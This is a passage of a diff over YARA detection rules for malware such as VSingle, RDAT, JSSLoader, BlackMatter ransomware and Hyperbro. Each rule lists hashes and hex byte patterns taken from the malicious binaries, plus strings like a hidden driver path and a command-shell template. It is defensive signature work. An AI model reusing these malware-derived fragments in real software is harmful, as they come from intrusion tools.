89 45 f4 83 7d } - $s3 = { 81 ec f4 02 00 00 c7 85 7c ff ff ff 90 15 40 00 c7 45 80 98 15 40 00 c7 45 84 a0 15 40 00 c7 45 88 a8 15 40 00 c7 45 8c b0 15 40 00 c7 45 90 b8 15 40 00 c7 45 94 c0 15 40 00 c7 45 98 c8 15 40 00 c7 45 9c d0 15 40 00 c7 45 a0 d8 15 40 00 c7 45 a4 e0 15 40 00 c7 45 a8 e8 15 40 00 c7 45 ac f0 15 40 00 c7 45 b0 f8 15 40 00 c7 45 b4 00 16 40 00 c7 45 b8 08 16 40 00 c7 45 bc 10 16 40 00 c7 45 c0 18 16 40 00 c7 45 c4 20 16 40 00 c7 45 c8 28 16 40 00 c7 45 cc 30 16 40 00 c7 45 d0 38 16 40 00 c7 45 d4 40 16 40 00 c7 45 d8 48 16 40 00 c7 45 dc 50 16 40 00 c7 45 e0 58 16 40 00 c7 45 fc 00 00 00 00 c7 45 e4 78 00 00 00 c7 45 e8 00 00 00 00 c7 45 f4 00 00 00 00 eb 09 8b 45 f4 83 c0 01 89 45 f4 83 7d f4 1a 7d 35 8b 4d f4 8b 94 8d 7c ff ff ff 52 ff 15 f8 50 41 00 83 f8 01 75 1d 8b 45 fc 8b 4d f4 8b 94 8d 7c ff ff ff 89 94 85 14 ff ff ff 8b 45 fc 83 c0 01 89 45 fc eb bc b9 02 00 00 00 6b d1 00 33 c0 66 89 84 15 0c fd ff ff 68 00 00 01 00 e8 00 e8 00 00 83 c4 04 89 45 f8 83 7d f8 00 0f 84 d4 00 00 00 68 00 00 01 00 e8 e6 e7 00 00 83 c4 04 89 45 ec 83 7d ec 00 0f 84 ae 00 00 00 68 00 80 00 00 8b 4d f8 51 ff 15 08 51 41 00 89 45 f0 83 7d fc 00 76 63 8d 55 e8 52 8b 45 e4 50 8d 8d 0c fd ff ff 51 8b 55 f8 52 ff 15 f4 50 41 00 85 c0 74 26 8d 85 0c fd ff ff 50 ff 15 40 50 41 00 83 f8 03 75 14 b9 02 00 00 00 6b d1 00 33 c0 66 89 84 15 0c fd ff ff eb 22 8b 4d fc 83 e9 01 89 4d fc 8b 55 f8 52 8b 45 fc 8b 8c 85 14 ff ff ff 51 ff 15 44 50 41 00 eb 02 eb 1b 68 00 80 00 00 8b 55 f8 52 8b 45 f0 50 ff 15 00 51 41 00 85 c0 0f 85 7a ff ff ff 8b 4d f0 51 ff 15 fc 50 41 00 8b 55 } + $seq1 = { b8 ff 00 00 00 50 b8 00 00 00 00 50 8d 85 dd fe ff ff 50 e8 ?? 0d 00 00 83 c4 0c b8 00 00 00 00 88 85 dc fd ff ff b8 ff 00 00 00 50 b8 00 00 00 00 50 8d 85 dd fd ff ff 50 e8 ?? 0d 00 00 83 c4 0c b8 00 00 50 00 50 e8 ?? 0d 00 00 83 c4 04 89 85 d8 fd ff ff 8b 85 d8 fd ff ff 89 85 d4 fd ff ff b8 00 00 50 00 50 b8 00 00 00 00 50 8b 85 d8 fd ff ff 50 e8 ?? 0c 00 00 83 c4 0c 8b 45 0c 8b 8d d8 fd ff ff 89 08 b8 3c 00 00 00 50 b8 00 00 00 00 50 8d 85 98 fd ff ff 50 e8 ?? 0c 00 00 83 c4 0c b8 3c 00 00 00 89 85 98 fd ff ff 8d 85 98 fd ff ff 83 c0 10 8d 8d dc fe ff ff 89 08 8d 85 98 fd ff ff 83 c0 14 b9 00 01 00 00 89 08 8d 85 98 fd ff ff 83 c0 2c 8d 8d dc fd ff ff 89 08 8d 85 98 fd ff ff 83 c0 30 b9 00 01 00 00 89 08 b8 0a 31 40 00 50 e8 ?? 0c 00 00 89 85 94 fd ff ff b8 16 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0c 00 00 89 45 fc b8 28 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0c 00 00 89 45 f8 b8 36 31 40 00 50 8b 85 94 fd ff ff 50 e8 [2] 00 00 89 45 f4 b8 47 31 40 00 50 8b 85 94 fd ff ff 50 e8 [2] 00 00 89 45 f0 b8 58 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0b 00 00 89 45 ec b8 69 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0b 00 00 89 45 e8 b8 7a 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0b 00 00 89 45 e4 b8 8e 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0b 00 00 89 45 e0 8b 45 08 50 e8 ?? 0b 00 00 83 c4 04 8d 8d 98 fd ff ff 51 b9 00 00 00 00 51 50 8b 45 08 50 8b 45 fc ff d0 85 } + $seq2 = { b8 00 00 00 00 89 85 90 fd ff ff b8 00 00 00 00 89 85 8c fd ff ff b8 00 00 00 00 89 85 88 fd ff ff b8 00 00 00 00 89 85 84 fd ff ff b8 04 00 00 00 89 85 80 fd ff ff b8 00 00 00 00 88 85 7f f5 ff ff b8 00 08 00 00 50 b8 00 00 00 00 50 8d 85 80 f5 ff ff 50 e8 ?? 0b 00 00 83 c4 0c b8 00 00 00 00 50 b8 00 00 00 00 50 b8 00 00 00 00 50 b8 00 00 00 00 50 b8 9d 31 40 00 50 8b 45 f8 ff d0 89 85 90 fd ff ff 8b 85 } + $s1 = "%s\\netfilter.sys" fullword ascii + $s2 = "SYSTEM\\CurrentControlSet\\Services\\netfilter" fullword ascii + $s3 = "\\\\.\\netfilter" fullword ascii condition: - uint16(0)==0x5a4d and filesize >30KB and all of them + uint16(0)==0x5a4d and filesize >6KB and ( all of ($seq*) or 2 of ($s*)) } -rule ARKBIRD_SOLG_APT_APT38_Vsingle_Mar_2021_1 : FILE +rule ARKBIRD_SOLG_APT_APT34_RDAT_July_2021_1 : FILE { meta: - description = "Detect VSingle used in attacks against Japanese organisations by APT38" + description = "Detect RDAT used by APT34" author = "Arkbird_SOLG" - id = "d1d640f6-bcec-5364-8ea5-e0c0b86da6e1" - date = "2021-03-23" - modified = "2021-03-24" - reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-23/APT38/APT_APT38_VSingle_Mar_2021_1.yar#L1-L24" + id = "136f8a9e-e680-5fab-8113-b4d33a47bc34" + date = "2021-07-15" + modified = "2021-07-16" + reference = "https://twitter.com/ShadowChasing1/status/1415206437806960647" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-15/APT34/APT_APT34_RDAT_July_2021_1.yara#L1-L22" license_url = "N/A" - logic_hash = "d01baac099ce33b837c83d6778900f7e55b8c63e75d0e552c10ababc8dec744c" - score = 50 - quality = 69 + logic_hash = "269788430ca8faff4b0ea5ec7c2a62f99f5f48ef3bc4ea3f7a27f1d735e64819" + score = 75 + quality = 75 tags = "FILE" - hash1 = "487c1bdb65634a794fa5e359c383c94945ce9f0806fcad46440e919ba0e6166e" - level = "experimental" + hash1 = "b59dea96ef94e8d32ee1a1805174318643569bbdca0d7569ede19467ff09dcdc" + hash2 = "65a6afc027ff851bd325d8a4f2ab4f326dd8f2c230bfd49a213c5afc00df8e2c" + hash3 = "f9f6dbb09773f708b125a4cca509047eb33c8c53d9e15a8c41ae3d7a8c3e5c7c" + tlp = "White" + adversary = "APT34" strings: - $dbg1 = { 68 74 74 70 [0-1] 3a 2f 2f 25 73 25 73 } - $dbg2 = { 43 72 65 61 74 65 4e 61 6d 65 64 50 69 70 65 41 20 66 69 6e 69 73 68 65 64 20 77 69 74 68 20 45 72 72 6f 72 2d 25 64 } - $dbg3 = { 4f 53 3a 20 25 73 25 73 20 53 50 20 25 64 20 25 73 20 28 25 64 2e 25 64 2e 25 64 29 0d 0a } - $dbg4 = { 63 00 6d 00 64 00 2e 00 65 00 78 00 65 00 20 00 2f 00 75 00 20 00 2f 00 63 00 20 00 25 00 73 } - $dbg5 = { 0d 0a 43 6f 6f 6b 69 65 3a 20 25 73 } - $dbg6 = { 25 73 5f 6d 61 69 6e } - $dbg7 = { 25 73 5f 66 69 6e } - $dbg8 = "3%3*373<3I3N3[3`3m3r3" fullword ascii - $s1 = { 8b 8d 80 f8 ff ff c7 41 04 01 00 00 00 83 e8 01 0f 84 aa 12 00 00 83 e8 01 0f 84 9a 12 00 00 83 e8 01 0f 84 8a 12 00 00 83 e8 01 0f 84 7a 12 00 } - $s2 = { 51 83 7d 08 00 75 07 b8 5b ab 66 00 eb 35 8b 45 08 89 45 fc 8b 4d fc } + $s1 = { 0a 6f 70 74 20 25 6c 75 28 25 6c 75 29 20 73 74 61 74 20 25 6c 75 28 25 6c 75 29 20 73 74 6f 72 65 64 20 25 6c 75 20 6c 69 74 20 25 75 20 64 69 73 74 20 25 75 } + $s2 = { 0a 6c 61 73 74 5f 6c 69 74 20 25 75 2c 20 6c 61 73 74 5f 64 69 73 74 20 25 75 2c 20 69 6e 20 25 6c 64 2c 20 6f 75 74 20 7e 25 6c 64 28 25 6c 64 25 25 29 } + $s3 = { 70 65 6e 53 43 4d 61 6e 61 67 65 72 20 66 61 69 6c 65 64 20 28 25 64 29 0a } + $s4 = { 43 72 65 61 74 65 53 65 72 76 69 63 65 20 66 61 69 6c 65 64 20 28 25 64 29 0a 00 00 00 00 00 00 53 65 72 76 69 63 65 20 69 6e 73 74 61 6c 6c 65 64 20 73 75 63 63 65 73 73 66 75 6c 6c 79 0a } + $s5 = { 49 8b cd ff 15 56 22 07 00 c6 05 87 7b 0a 00 00 c7 05 81 7b 0a 00 60 ea 00 00 49 83 c9 ff 45 33 c0 48 8d 55 20 48 8d 0d f3 7b 0a 00 e8 26 a4 ff ff 49 83 c9 ff 45 33 c0 48 8d 55 00 48 8d 0d bc 7b 0a 00 e8 0f a4 ff ff 41 b8 07 00 00 00 48 8d 15 92 b8 08 00 48 8d 0d 03 7c 0a 00 e8 16 a3 ff ff 49 83 c9 ff 45 33 c0 48 8d 55 40 48 8d 0d 6c 7b 0a 00 e8 df a3 ff ff 41 b8 ?? 00 00 00 48 8d 15 6a b8 08 00 48 8d 0d 13 7c 0a 00 e8 e6 a2 ff ff 48 8d 1d 0f 7d 0a 00 48 8b c3 48 83 3d 1c 7d 0a 00 08 48 0f 43 05 fc 7c 0a 00 48 89 44 24 58 48 8d 05 a0 03 00 00 48 89 44 24 60 48 89 7c 24 68 48 89 7c 24 70 48 8d 4c 24 58 ff 15 4e 21 07 00 85 c0 75 29 48 83 3d e2 7c 0a 00 08 48 0f 43 1d c2 7c 0a 00 48 8b d3 33 c9 ff 15 37 21 07 00 48 85 c0 74 09 48 8b c8 ff 15 f1 20 07 00 83 7c 24 30 02 7f 5d 48 8d 44 24 48 48 89 44 24 28 89 7c 24 20 45 33 c9 4c 8d 05 0a 71 ff ff 33 d2 33 c9 ff 15 60 22 07 00 48 8d 44 24 50 48 89 44 24 28 89 7c 24 20 45 33 c9 4c 8d 05 a8 95 ff ff 33 d2 33 c9 ff 15 3e 22 07 00 83 ca ff 48 8b c8 ff 15 f2 20 07 00 b9 64 00 00 00 ff 15 47 22 07 } + $s6 = { 48 89 7d f0 48 89 7d f8 45 33 c0 33 d2 48 8d 4d e0 e8 43 a7 ff ff 41 b8 2c 00 00 00 48 8d 15 be bc 08 00 48 8d 4d e0 e8 ad a7 ff ff 48 89 7d 70 48 89 7d 78 45 33 c0 33 d2 48 8d 4d 60 e8 17 a7 ff ff 45 33 c0 48 8d 15 77 94 08 00 48 8d 4d 60 e8 84 a7 ff ff 83 7c 24 30 02 75 6e 48 8d 85 a8 00 00 00 48 89 85 a0 00 00 00 41 b8 03 00 00 00 49 8b 55 08 48 8d 8d a0 00 00 00 e8 c9 0a 00 00 48 8b 95 a0 00 00 00 48 8d 4d a0 e8 89 a5 ff ff 48 8d 85 a8 00 00 00 48 8b 8d a0 00 00 48 89 85 b0 10 00 00 48 8b da 48 8b f9 33 f6 89 74 24 78 c7 45 80 18 00 00 00 c7 45 90 01 00 00 00 48 89 75 88 45 33 c9 4c 8d 45 80 48 8d 54 24 68 48 8d 4c 24 60 ff 15 81 fe 06 00 45 33 c0 8d 56 01 48 8b 4c 24 60 ff 15 68 fe 06 00 45 33 c9 4c 8d 45 80 48 8d 54 24 70 48 8d 4c 24 58 ff 15 59 fe 06 00 45 33 c0 8d 56 01 48 8b 4c 24 58 ff 15 40 fe 06 00 33 c0 48 89 45 98 48 89 45 a0 48 89 45 a8 33 d2 44 8d 46 68 48 8d 4d c0 e8 ab 89 04 00 c7 45 c0 68 00 00 00 48 8b 44 24 68 48 89 45 20 48 8b 44 24 70 48 89 45 18 81 4d fc 00 01 00 00 48 8b d3 48 8d 4d 30 e8 bf fe ff ff 90 4c 8b c0 48 8d 8d 90 00 00 00 e8 9f 0d 00 00 90 45 33 c0 b2 01 48 8d 4d 30 e8 d0 7d ff ff 48 8d 95 90 00 00 00 48 83 bd a8 00 00 00 08 48 0f 43 95 90 00 00 00 48 8d 45 98 48 89 44 24 48 48 8d 45 c0 48 89 44 24 40 48 89 74 24 38 48 89 74 24 30 c7 44 24 28 00 00 00 08 c7 44 24 20 01 00 00 00 45 33 c9 45 33 c0 33 c9 ff 15 a7 fd 06 00 48 8b 4c 24 68 ff 15 94 fd 06 00 48 8b 4c 24 70 ff 15 89 fd 06 00 48 89 b5 80 00 00 00 48 89 b5 88 00 00 00 } condition: - uint16(0)==0x5a4d and filesize >30KB and 6 of ($dbg*) and all of ($s*) + uint16(0)==0x5a4d and filesize >80KB and 5 of ($s*) } -rule ARKBIRD_SOLG_APT_APT38_Valeforbeta_Mar_2021_1 : FILE +rule ARKBIRD_SOLG_MAL_Jssloader_Jun_2021_1 : FILE { meta: - description = "Detect ValeforBeta used in attacks against Japanese organisations by APT38" + description = "Detect JSSLoader malware" author = "Arkbird_SOLG" - id = "74a20725-3e52-5fef-9934-c812137dc989" - date = "2021-03-23" - modified = "2021-03-24" + id = "192b1386-f0bc-54e8-9341-84f77f4f07c5" + date = "2021-06-04" + modified = "2021-06-05" reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-23/APT38/APT_APT38_ValeforBeta_Mar_2021_1.yar#L1-L22" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-04/FIN7/MAL_JSSLoader_Jun_2021_1.yara#L1-L20" license_url = "N/A" - logic_hash = "0ee8202b8978bf487df2a63c17d139076f2e9f68f1827a17929522060a72937a" - score = 50 - quality = 67 + logic_hash = "73942afed6b3471be07be1fba3e7f90ec7f2377a1167aeef70627cd07faa3681" + score = 75 + quality = 75 tags = "FILE" - hash1 = "eb846bb491bea698b99eab80d58fd1f2530b0c1ee5588f7ea02ce0ce209ddb60" - level = "experimental" + hash1 = "59c6acc8f6771ea6eeb8d8f03832642d87f9aa7eb0c3205398d31ad08e019a9c" + hash2 = "2609c6ec5d4fdde28d29c272484da66e0995e529cf302ed46f94c68cd99352e3" + hash3 = "ea167f5460c5f920699e276fb0c51f32c862256415c57edb4bda5760a70b9e4d" + hash4 = "822457c427a0776b41dd8f3479070e56fdd53ccd0175418d4e7d85065ec7d7d1" + tlp = "White" + adversary = "FIN7" strings: - $dbg1 = { 2f 64 64 65 00 00 00 64 64 65 65 78 65 63 } - $dbg2 = { 25 73 5c 53 68 65 6c 6c 4e 65 77 } - $dbg3 = { 25 73 20 28 25 73 3a 25 64 29 0a 25 73 } - $dbg4 = { 7b 25 30 38 58 2d 25 30 34 58 2d 25 30 34 58 2d 25 30 32 58 25 30 32 58 2d 25 30 32 58 25 30 32 58 25 30 32 58 25 30 32 58 25 30 32 58 25 30 32 58 7d } - $dbg5 = { 25 73 25 73 2e 64 6c 6c } - $dbg6 = { 25 73 5c 73 68 65 6c 6c 5c 6f 70 65 6e 5c 25 73 00 00 00 00 25 73 5c 73 68 65 6c 6c 5c 70 72 69 6e 74 5c 25 73 00 00 00 25 73 5c 73 68 65 6c 6c 5c 70 72 69 6e 74 74 6f 5c 25 73 00 25 73 5c 44 65 66 61 75 6c 74 49 63 6f 6e 00 00 25 73 5c 53 68 65 6c 6c 4e 65 77 00 2c 25 64 00 63 6f 6d 6d 61 6e 64 00 20 22 25 31 22 00 00 00 20 2f 70 20 22 25 31 22 00 00 00 00 20 2f 70 74 20 22 25 31 22 20 22 25 32 22 20 22 25 33 22 20 22 25 34 22 } - $dbg7 = { 43 4c 53 49 44 5c 25 31 5c 49 6e 50 72 6f 63 53 65 72 76 65 72 33 32 } - $s1 = { 74 f1 ff b5 a8 fe ff ff 8d 4b 10 c7 43 08 03 00 00 00 e8 3c cf fd ff eb da 8d 8d ac fe ff ff e8 3f 1a fc ff 83 65 fc 00 8d 85 ac fe ff ff 50 57 e8 bd fd ff ff ff b5 ac fe ff ff ff 15 24 44 47 00 85 c0 0f 85 be 00 00 00 50 50 8d 8d a0 fe ff ff 51 8d 8d 9c fe ff ff 51 50 50 50 ff b5 ac fe ff ff ff 15 70 42 47 00 85 c0 75 1f ff b5 a8 fe ff ff 53 e8 dc fe ff ff 8b 8d ac fe ff ff } - $s2 = { 45 fc 8b 45 0c 0f b6 48 0f 56 51 0f b6 48 0e 51 0f b6 48 0d 51 0f b6 48 0c 51 0f b6 48 0b 51 0f b6 48 0a 51 0f b6 48 09 51 0f b6 48 08 8b 75 08 83 a5 f8 fe ff ff 00 51 0f b7 48 06 51 0f b7 48 04 51 ff 30 8d 85 fc fe ff ff 68 48 aa 47 00 68 00 01 00 00 } + $s1 = { 8b 45 c8 83 78 0c 00 0f 84 ce 00 00 00 8b 45 c8 8b 4d 08 03 48 0c 8b f4 51 ff 15 [3] 00 3b f4 e8 [2] 00 00 89 45 bc 83 7d bc 00 75 05 e9 a7 00 00 00 8b 45 c8 8b 4d 08 03 48 10 89 4d f8 8b 45 c8 8b 4d 08 03 08 89 4d ec 8b 45 ec 3b 45 08 75 06 8b 45 f8 89 45 ec 8b 45 ec 83 38 00 74 6c 8b 45 ec 8b 08 81 e1 00 00 00 } + $s2 = { 8b f4 6a 04 68 00 10 00 00 8b 45 c8 8b 4d c8 8b 50 04 2b 11 52 6a 00 ff 15 [3] 00 3b f4 e8 [2] 00 00 89 45 f8 83 7d f8 00 75 05 e9 a7 00 00 00 8b 45 c8 8b 4d c8 8b 50 04 2b 11 52 8b 45 c8 8b 08 51 8b 55 f8 52 e8 [2] 00 00 83 c4 0c 8b f4 8b 45 f8 50 8b fc ff 15 [3] 00 3b fc e8 [2] 00 00 50 ff 15 [3] 00 3b f4 e8 [2] 00 00 8b f4 6a 04 68 00 10 00 00 68 00 11 00 00 6a 00 ff 15 [3] 00 3b f4 e8 [2] 00 00 89 45 ec 83 7d ec 00 75 02 eb 3e 8b 45 c8 8b 48 08 8b 11 89 55 e0 83 7d e0 ff 75 0c c7 85 00 ff ff ff 00 00 00 00 eb 09 8b 45 e0 89 85 00 ff ff ff 8b 8d 00 ff ff ff 8b 55 ec 8b 45 f8 89 04 8a 8b 45 ec 64 a3 2c 00 00 00 5f 5e 5b 81 c4 00 01 00 00 3b ec e8 [2] 00 00 8b e5 5d } + $s3 = { c7 45 f0 61 00 00 00 c7 45 c8 20 00 00 00 c7 45 cc 88 00 00 00 c7 45 dc 01 00 00 00 8d 45 f0 89 45 d0 33 c0 66 89 45 d4 c7 45 d8 00 00 00 00 c7 45 e0 00 00 00 00 8b 45 08 89 45 e4 8b f4 8d 45 c8 50 ff 15 [3] 00 3b f4 e8 [2] 00 00 89 45 b0 83 7d b0 ff 74 17 8b f4 8d 45 bc 50 8b 4d b0 51 ff 15 [3] 00 3b f4 e8 [2] 00 00 52 8b cd 50 8d 15 2c 13 40 00 e8 [2] 00 00 58 5a 5f 5e 5b 8b 4d fc 33 cd e8 [2] 00 00 81 c4 2c 01 00 00 3b ec e8 [2] 00 00 8b e5 } + $s4 = { 8b 45 ec 8b 08 81 e1 ff ff 00 00 8b f4 51 8b 55 bc 52 ff 15 [3] 00 3b f4 e8 [2] 00 00 8b 4d f8 89 01 eb 25 8b 45 ec 8b 08 8b 55 08 8d 44 0a 02 8b f4 50 8b 4d bc 51 ff 15 [3] 00 3b f4 e8 [2] 00 00 8b 55 f8 89 02 8b 45 f8 83 c0 04 89 45 f8 8b 45 ec 83 c0 04 89 45 ec eb 8c 8b 45 c8 83 c0 14 89 45 c8 e9 25 ff ff ff 5f 5e 5b 81 c4 08 01 00 00 3b ec e8 [2] 00 00 8b e5 } condition: - uint16(0)==0x5a4d and filesize >30KB and 5 of ($dbg*) and 1 of ($s*) + uint16(0)==0x5a4d and filesize >100KB and filesize <900KB and all of ($s*) } -import "pe" - -rule ARKBIRD_SOLG_Backdoor_APT_Nazar_April_2020_1 : FILE +rule ARKBIRD_SOLG_RAN_Blackmatter_Aug_2021_1 : FILE { meta: - description = "Detect strings used by APT Nazar" + description = "Detect BlackMatter ransomware" author = "Arkbird_SOLG" - id = "727a1f4e-1371-5a95-bce9-4a4f701a2ac6" - date = "2020-04-29" - modified = "2023-11-22" - reference = "Internal research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-04-29/Yara_Rule_APT_Bazar-April_2020_1.yar#L3-L29" + id = "eb308cde-af92-5b34-b256-88009f90810f" + date = "2021-08-02" + modified = "2021-08-02" + reference = "https://twitter.com/abuse_ch/status/1421834305416933376" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-01/Blackmatter/RAN_BlackMatter_Aug_2021_1.yara#L1-L23" license_url = "N/A" - logic_hash = "79028588ac6afd3e3d0d839d10eada9e5382991eebb600b0dae2119bcd7eac93" - score = 75 - quality = 73 + logic_hash = "ff158ce977eb10f36c9e8a032dd3880fcd5ecc09e9cc07cd27b98bbce5661d75" + score = 50 + quality = 71 tags = "FILE" - hash1 = "2fe9b76496a9480273357b6d35c012809bfa3ae8976813a7f5f4959402e3fbb6" + hash1 = "22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6" + hash2 = "7f6dd0ca03f04b64024e86a72a6d7cfab6abccc2173b85896fc4b431990a5984" + level = "Experimental" + tlp = "white" + adversary = "-" strings: - $s1 = "101;0000;" fullword ascii - $s2 = "hodll.dll" fullword ascii - $s3 = { 70 73 73 64 6B ?? ?? 2E 73 79 73 } - $s4 = { 70 73 73 64 6B ?? ?? 2E 76 78 64 } - $s5 = "##$$%%&&''(())**++,,--..//0123456789:;<=>?" fullword ascii - $s6 = "SYSTEM\\CurrentControlSet\\Services\\VxD\\MSTCP" fullword ascii - $s7 = "removehook" fullword ascii - $s8 = "installhook" fullword ascii - $s9 = "_crt_debugger_hook" fullword ascii - $s10 = "\\Files.txt" fullword ascii - $s11 = "\\report.txt" fullword ascii - $s12 = "\\Programs.txt" fullword ascii - $s13 = "\\Devices.txt" fullword ascii - $s14 = "\\music.mp3" fullword ascii - $s15 = "\\z.png" fullword ascii + $s1 = { 55 8b ec 81 ec ac 02 00 00 53 51 52 56 57 c7 45 fc 00 00 00 00 c7 45 f4 00 00 00 00 c7 45 f0 00 00 00 00 c7 45 ec 00 00 00 00 6a 00 ff 15 00 15 41 00 85 c0 0f 85 3e 04 00 00 8d 45 d4 50 6a 00 6a 00 6a 00 6a 00 6a 00 ff 15 84 15 41 00 85 c0 0f 85 1c 04 00 00 8d 85 7c ff ff ff c7 00 b1 5f 5a 22 c7 40 04 c8 5f 75 22 c7 40 08 b1 5f 06 22 b9 03 00 00 00 81 30 ed 5f 06 22 83 c0 04 49 75 f4 8b 7d 08 8b 4d d4 8d 45 f8 50 6a 00 6a 00 6a 00 6a 00 6a 02 ff 71 1c ff 15 88 15 41 00 85 c0 75 6d 8d 45 dc 50 6a 00 6a 00 ff 75 f8 ff 15 8c 15 41 00 85 } + $s2 = { 8d 45 88 c7 00 a1 5f 42 22 c7 40 04 ac 5f 56 22 c7 40 08 d7 5f 29 22 c7 40 0c c2 5f 45 22 c7 40 10 a3 5f 3b 22 c7 40 14 ae 5f 69 22 c7 40 18 80 5f 76 22 c7 40 1c 98 5f 72 22 c7 40 20 88 5f 74 22 c7 40 24 9e 5f 2a 22 c7 40 28 ed 5f 06 22 b9 0b 00 00 00 81 30 ed 5f 06 22 83 c0 04 49 75 f4 8d 45 88 50 8d 85 54 fd ff ff 50 ff 15 dc 12 41 00 83 c4 08 ff 75 cc 8d 85 54 fd ff ff 50 ff 15 d8 12 41 00 83 c4 08 8d 45 ec 50 8d 85 5c ff ff ff 50 6a 01 6a 00 6a 00 8d 85 54 fd ff ff 50 ff 15 98 15 41 00 } + $s3 = { 8d 45 b4 c7 00 21 0a 83 e9 c7 40 04 c5 ce d7 33 c7 40 08 40 c4 06 e2 c7 40 0c a2 87 fb dd b9 04 00 00 00 81 30 ed 5f 06 22 83 c0 04 49 75 f4 8d 45 a4 c7 00 6a f9 14 fe c7 40 04 92 2c c9 33 c7 40 08 65 12 06 88 c7 40 0c ed 14 28 06 b9 04 00 00 00 81 30 ed 5f 06 22 83 c0 04 49 75 f4 8d 45 94 c7 00 75 39 4d 45 c7 40 04 7f b1 d6 33 c7 40 08 40 2e 06 e2 c7 40 0c a2 87 fb dd b9 04 00 00 00 81 30 ed 5f 06 22 83 c0 04 49 75 f4 8d 45 84 c7 00 99 f9 aa 66 c7 40 04 11 b7 d6 33 c7 40 08 4d 23 06 e2 c7 40 0c a2 e9 8e 02 b9 04 00 00 00 81 30 ed 5f 06 22 83 c0 04 49 75 f4 8d 85 b8 fe ff ff c7 00 b2 5f 59 22 c7 40 04 bd 5f 74 22 c7 40 08 82 5f 70 22 c7 40 0c 84 5f 62 22 c7 40 10 88 5f 74 22 c7 40 14 ac 5f 74 22 c7 40 18 8e 5f 6e 22 c7 40 1c 84 5f 72 22 c7 40 20 88 5f 65 22 c7 40 24 99 5f 73 22 c7 40 28 9f 5f 63 22 c7 40 2c ed 5f 06 22 b9 0c 00 00 00 81 30 ed 5f 06 22 83 c0 04 49 75 f4 8d 85 6c ff ff ff c7 00 bf 5f 49 22 c7 40 04 a2 5f 52 22 c7 40 08 b1 5f 45 22 c7 40 0c a4 5f 4b 22 c7 40 10 bb 5f 34 22 c7 40 14 ed 5f 06 22 b9 06 00 00 } + $s4 = { 8d bd fc fe ff ff 32 c0 aa b9 2a 00 00 00 b0 ff f3 aa b0 3e aa b9 03 00 00 00 b0 ff f3 aa b0 3f aa b9 0a 00 00 00 b0 34 aa fe c0 e2 fb b9 03 00 00 00 b0 ff f3 aa 32 c0 aa b9 03 00 00 00 b0 ff f3 aa } + $s5 = { 35 35 35 4f 35 58 35 22 36 35 36 3f 36 2c 37 3f 37 60 37 76 37 } + $s6 = { 3d 2b 3d 47 3d 4d 3d 60 3d 67 3d 6d 3d } + $s7 = { 8b 0e 0f b6 d1 0f b6 dd 57 8d bd fc fe ff ff 8a 04 3a 8a 24 3b c1 e9 10 83 c6 04 0f b6 d1 0f b6 cd 8a 1c 3a 8a 3c 39 5f 8a d4 8a f3 c0 e0 02 c0 eb 02 c0 e6 06 c0 e4 04 c0 ea 04 0a fe 0a c2 0a e3 88 07 88 7f 02 88 67 01 ff 4d fc } condition: - 12 of them and filesize >120KB + uint16(0)==0x5A4D and filesize >25KB and 5 of ($s*) } -rule ARKBIRD_SOLG_APT_APT27_Hyperbro_Apr_2021_1 : FILE +import "pe" + +rule ARKBIRD_SOLG_APT_MAL_Donot_Loader_June_2020_1 : FILE { meta: - description = "Detect Hyperbro backdoor" - author = "Arkbird_SOLG" - id = "060a200e-17dd-5789-94d4-eeff5c2e9a18" - date = "2021-05-01" - modified = "2021-05-04" - reference = "-" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-03/APT27/APT_APT27_Hyperbro_Apr_2021_1.yara#L1-L21" + description = "Detect loader malware used by APT Donot for drops the final stage" + author = "Arkbird_SOLG" + id = "ec4cac12-529f-56d2-bbc0-5fe30424b10b" + date = "2020-06-22" + modified = "2020-06-22" + reference = "https://twitter.com/ccxsaber/status/1274978583463649281" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-22/APT_MAL_Donot_Loader_June_2020_1.yar#L3-L22" license_url = "N/A" - logic_hash = "1a32ab7c30885a665ede66640a9b047e3c381f6f535243fcadf1a7a22e76f407" + logic_hash = "986deffd48c1fb707948b00e1e200fa6538d4c73a32ab89f5119403f9bf0d734" score = 75 - quality = 35 + quality = 75 tags = "FILE" - hash1 = "36fad80a5f328f487b20a3f5fc5f1902d50cbb1bd9167c44b66929a1288fc6f4" - hash2 = "52072a8f99dacd5c293fccd051eab95516d8b880cd2bc5a7e0f4a30d008e22a7" - hash3 = "9000ce3c0e01b6c80edb3af87aad8117513ce334135aa7d7b1c2afa067f4c4ab" - hash4 = "92bbcb5461ab5959e31f997a6df77995377d69f8077e43e5812fcbe9303d831c" - tlp = "White" - adversary = "APT27" + hash1 = "1ff33d1c630db0a0b8b27423f32d15cc9ef867349ac71840aed47c90c526bb6b" strings: - $seq1 = { 8b [5] 7? 0? [2] 0? ?? 0? [3] ff 75 0? [11] 5? [2] 0? ?? 8b } - $seq2 = { e8 ?? 0? 00 00 b0 01 c3 55 8b ec ff 75 08 ff 15 34 c0 00 10 85 c0 74 11 56 8b 30 50 e8 ?? 1? 00 00 8b c6 59 85 f6 75 f1 5e 5d c3 cc 8b 4c 24 0c 0f b6 44 24 08 8b d7 8b 7c 24 04 85 c9 0f 84 3c 01 00 00 69 c0 01 01 01 01 83 f9 20 0f 8e df 00 00 00 81 f9 80 00 00 00 0f 8c 8b 00 00 00 0f 